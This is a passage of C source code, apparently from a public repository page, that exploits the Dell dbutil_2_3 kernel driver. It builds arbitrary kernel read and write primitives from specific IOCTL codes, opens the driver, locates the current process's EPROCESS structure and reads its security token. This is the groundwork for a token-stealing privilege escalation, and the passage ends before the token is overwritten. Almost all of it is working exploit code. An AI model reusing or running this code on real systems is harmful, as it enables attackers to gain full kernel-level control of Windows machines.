DeviceIoControl(hDriver, 0x9b0c1ec4, &Request, sizeof(Request), &Response, sizeof(Response), &dwBytesReturned, NULL);
|
||||
return Response[3];
|
||||
}
|
||||
|
||||
VOID KernelWrite(HANDLE hDriver, ULONG_PTR DstAddr, ULONG_PTR Data) {
|
||||
DWORD dwBytesReturned = 0;
|
||||
ULONG_PTR Request[4] = { 0, 0, 0, 0 };
|
||||
ULONG_PTR Response[4] = { 0, 0, 0, 0 };
|
||||
|
||||
Request[1] = DstAddr;
|
||||
Request[3] = Data;
|
||||
DeviceIoControl(hDriver, 0x9b0c1ec8, &Request, sizeof(Request), &Response, sizeof(Response), &dwBytesReturned, NULL);
|
||||
return;
|
||||
}
|
||||
|
||||
DWORD Exploit(PVOID pPayload) {
|
||||
HANDLE hDriver = INVALID_HANDLE_VALUE;
|
||||
HANDLE hProc = INVALID_HANDLE_VALUE;
|
||||
PSYSTEM_HANDLE_TABLE_ENTRY_INFO pHandleEntryInfo = NULL;
|
||||
|
||||
if (!ResolveRequirements()) {
|
||||
dprintf("[-] Failed to resolve requirements\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
hDriver = CreateFile(_T("\\\\.\\dbutil_2_3"), GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
|
||||
if (hDriver == INVALID_HANDLE_VALUE) {
|
||||
dprintf("[-] Failed to get a handle to the driver\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
hProc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, GetCurrentProcessId());
|
||||
if (hProc == NULL) {
|
||||
dprintf("[-] Failed to get a handle to the current process\n");
|
||||
}
|
||||
|
||||
pHandleEntryInfo = GetHandleEntryInfo(hProc, GetCurrentProcessId());
|
||||
if (pHandleEntryInfo == NULL) {
|
||||
dprintf("[-] Failed to get the handle entry information\n");
|
||||
}
|
||||
|
||||
dprintf("[*] Current nt!_EPROCESS found at 0x%p\n", pHandleEntryInfo->Object);
|
||||
dprintf("[*] nt!_EPROCESS->Token = 0x%p\n", KernelRead(hDriver, (ULONG_PTR)pHandleEntryInfo->Object + g_pEprocessOffsets->Token));
|
||||
return 0;
|
||||
}
|
Loading…
Reference in New Issue